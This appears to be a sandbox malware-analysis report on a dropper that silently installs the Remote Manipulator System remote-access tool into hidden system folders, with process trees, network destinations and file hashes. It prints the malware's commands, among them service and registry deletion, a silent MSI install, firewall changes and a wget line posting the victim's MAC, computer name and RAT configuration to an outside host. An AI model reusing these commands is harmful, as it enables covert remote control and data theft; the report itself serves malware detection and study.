PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

C:\Users\Admin\AppData\Local\Temp\set.exe

"C:\Users\Admin\AppData\Local\Temp\set.exe" -p1234567890__

C:\Users\Admin\AppData\Local\Temp\setting.exe

"C:\Users\Admin\AppData\Local\Temp\setting.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.cmd" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\system32\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Windows\syswow64\sysfiles"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\attrib.exe

attrib -S -H -r "C:\Program Files (x86)\Remote Manipulator System - Server"

C:\Windows\SysWOW64\net.exe

net stop rmanservice

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop rmanservice

C:\Windows\SysWOW64\sc.exe

sc delete "rmanservice"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rfusclient.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe *32

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\find.exe

find "rutserv.exe *32"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe *32

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {FE83B905-4554-4DFF-97F4-9292178CB171} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\msiexec.exe

MsiExec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC465 95B9E70" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AB7AA605-500F-4153-8207-FB5563419112}" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKCR\Installer\Products\506AA7BAF00535142870BF5536141921" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6EDC4423414699340B5D245426472701" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E45BAE6295648E74689FC47BF4E730EB" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E5052F47A02BDEA469F8EAB572D83BA8" /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\System\CurrentControlSet\Services\RManService" /f

C:\Windows\SysWOW64\PING.EXE

ping -n 1 -w 500 google.com.ua

C:\Windows\SysWOW64\msiexec.exe

MsiExec /I "rms5.2.1.msi" /qn

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 14B7B4596FA45B7BCF74D202BD8A2D13

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

"C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

"C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\sysfiles\rutserv.exe

C:\Windows\SysWOW64\PING.EXE

ping -n 10 127.0.0.1

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"

C:\Windows\SysWOW64\reg.exe

Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"

C:\Windows\SysWOW64\find.exe

Find /I "Options"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"

C:\Windows\SysWOW64\getmac.exe

getmac

C:\Windows\SysWOW64\find.exe

Find /I "Tcpip"

C:\Users\Admin\AppData\Local\Temp\wget.exe

wget --post-data="mac=76-BA-EE-31-78-4E&comp=MHKKHUYI&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E080A496E7465726E657449640614532D45464244464346342D464333462D3433413411557365496E6574436F6E6E656374696F6E0913557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" "http://rms.admin-ru.ru/updater.php" -q -O -

C:\Windows\SysWOW64\PING.EXE

ping -n 3 127.0.0.1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com.ua udp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms.admin-ru.ru udp

Files

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

C:\Users\Admin\AppData\Local\Temp\set.exe

MD5 d2d30a3f6adc1c7172e95346db406ac5
SHA1 60afc3240100c41190bea61d1a1269411c46a9a7
SHA256 27de2eaf228d84d632c39f38c679080083b27f65738f4d4340d7118aa304957d
SHA512 3e12526e268f7fa3f5ab05eb93ac54cc51b509a01f13ac71059107c4b5d04e37f3bf09f7dd62499f6f2506929e0876717c0fbba6f6b5e5ceb1e6cf7c0a5d2bc4

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\setting.exe

MD5 5913f76c2f3b690c5f258c99361a56a7
SHA1 ea865544d22a480a8451cabdbd89f187c7932798
SHA256 f24120d552d2ac35919e34e4896b1c6ca294106ef4ffcd5a68dc959f39b1f1c3
SHA512 d666fa88fdfcefa1456774bd4d3600f7f76c45bcec1820a095ee4be931ff8b043973503c5b6d7d8c93a3cd337ff6d12cbb272f2523e0178dca1d2d60e11e8c36

C:\Users\Admin\AppData\Local\Temp\install.cmd

MD5 72b87d46624306c3e39acee8794c4dff
SHA1 6d5717c0b19f6b01419131eac2a713c5381e8156
SHA256 df42bf4d7de1d91d8d46bf5cac60395025650aa5107beb4a7d73f274c098aecb
SHA512 544ca3365d31fce1d50d7f380c0e67219c9b4146da258b76a91fa655aa4471bb3bfad7e0b257fff7e18abc7b1a4dfdcbc767915984c080a823a327c17a686fc7

C:\Users\Admin\AppData\Local\Temp\rms5.2.1.msi

MD5 2abaf6748b3b3a8aad84f715ae3bd3c1
SHA1 c03d62077019f114c317e6e78b5c3b0e8893cd0e
SHA256 c6e22f166038f6f2d131ade1861ace4fd83f0ce9dc46f5b5f0332ef918ef0164
SHA512 b4f563c9e5d2aac42fb088851c1e00de4cbf8c9506e2d09f86eaedb9cd103ad19a0ed50e3e4c1dee892eb25a37f5b2221c8c609ddd83d2fb3f51c5891cfdeec2

C:\Windows\Installer\MSIF5BB.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

\Windows\Installer\MSIF5BB.tmp

MD5 b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256 b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

memory/2848-391-0x0000000000870000-0x000000000091E000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/3968-394-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

C:\Windows\SysWOW64\sysfiles\RWLN.dll

MD5 bb1f3e716d12734d1d2d9219a3979a62
SHA1 0ef66eed2f2ae45ec2d478902833b830334109cb
SHA256 d7e9c9043ed7df2af800d9b2a33e3efddf68b70f043e9717afc4b7dd4e13e077
SHA512 bbc90747dd45a01b05f5c0b6fa58ffe18af894b05363267ac1cc9fe3262f5e65c8ae4e08dfd82d89b9112e86e42d24a12784b79f5ea30b6443015c19b6792c9c

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/64-402-0x0000000002390000-0x0000000002391000-memory.dmp

memory/684-403-0x0000000000A70000-0x0000000000BBA000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Windows\SysWOW64\sysfiles\rutserv.exe

MD5 5cd22562ef246c66c255676937d33f0d
SHA1 1d44452f59a8cf755e7931c55f2f84d147400b8e
SHA256 a063ec7ae0beda06cec13706320f5a9d537e4f19755ce2761cbc2b25070e2246
SHA512 0da8af59ae88169947114a0fdca61106863faf7244072f011c68270f197945fb384a319ccb7bf99d460458500d8e6f88306006bb6d76d19a13ab67adec1b21cf

C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll

MD5 8e3f59b8c9dfc933fca30edefeb76186
SHA1 37a78089d5936d1bc3b60915971604c611a94dbd
SHA256 528c0656751b336c10cb4c49b703eae9c3863f7f416d0e09b198b082cc54aeb8
SHA512 3224c20c30556774fd4bed78909f451b9a5a46aa59271b5e88b1e0e60145d217802a8f1fda3d3fabcd8546ca7783e0c70f0c419a28efe6c5160a102553a3c91d

C:\Windows\SysWOW64\sysfiles\vp8encoder.dll

MD5 c638bca1a67911af7f9ed67e7b501154
SHA1 0fd74d2f1bd78f678b897a776d8bce36742c39b7
SHA256 519078219f7f6db542f747702422f902a21bfc3aef8c6e6c3580e1c5e88162b8
SHA512 ca8133399f61a1f339a14e3fad3bfafc6fe3657801fd66df761c88c18b2dc23ceb02ba6faa536690986972933bec2808254ef143c2c22f881285facb4364659f

C:\Windows\SysWOW64\sysfiles\vp8decoder.dll

MD5 6f6bfe02e84a595a56b456f72debd4ee
SHA1 90bad3ae1746c7a45df2dbf44cd536eb1bf3c8e2
SHA256 5e59b566eda7bb36f3f5d6dd39858bc9d6cf2c8d81deca4ea3c409804247da51
SHA512 ed2a7402699a6d00d1eac52b0f2dea4475173be3320dfbad5ca58877f06638769533229bc12bce6650726d3166c0e5ebac2dad7171b77b29186d4d5e65818c50

C:\Windows\SysWOW64\sysfiles\ripcserver.dll

MD5 30e269f850baf6ca25187815912e21c5
SHA1 eb160de97d12b4e96f350dd0d0126d41d658afb3
SHA256 379191bfd34d41e96760c7a539e2056a22be3d44bf0e8712b53e443f55aead90
SHA512 9b86a4eefdcae46e605f85e752ef61e39fd0212a19b7fd4c35eb3ab99851a0b906d048d12d1e1e985a340a67a64d405b8cf803555865137278f0c19d686df5e7

C:\Windows\SysWOW64\sysfiles\rasadhlp.dll

MD5 8679b09cc9600a1f11a3c09cec12637b
SHA1 cad5c92e561b64d1f4e1f70c7596dcf186304ecb
SHA256 7e840982833d4c4d68835003960762fa3982c899ac1c8b63e4fdbbb35448152f
SHA512 93a8d0e78932793ccd534c17c48af203665d7b3d326d7b21b2b4aa54925a853e674324774fa9a99194eca7a930d504568095529a6b6a2e63b73f0c719bc424e6

C:\Windows\SysWOW64\sysfiles\msvcp90.dll

MD5 b2eee3dee31f50e082e9c720a6d7757d
SHA1 3322840fef43c92fb55dc31e682d19970daf159d
SHA256 4608beedd8cf9c3fc5ab03716b4ab6f01c7b7d65a7c072af04f514ffb0e02d01
SHA512 8b1854e80045001e7ab3a978fb4aa1de19a3c9fc206013d7bc43aec919f45e46bb7555f667d9f7d7833ab8baa55c9098af8872006ff277fc364a5e6f99ee25d3

C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll

MD5 ff622a8812d8b1eff8f8d1a32087f9d2
SHA1 910615c9374b8734794ac885707ff5370db42ef1
SHA256 1b8fe11c0bdcbf1f4503c478843de02177c606912c89e655e482adec787c2ebf
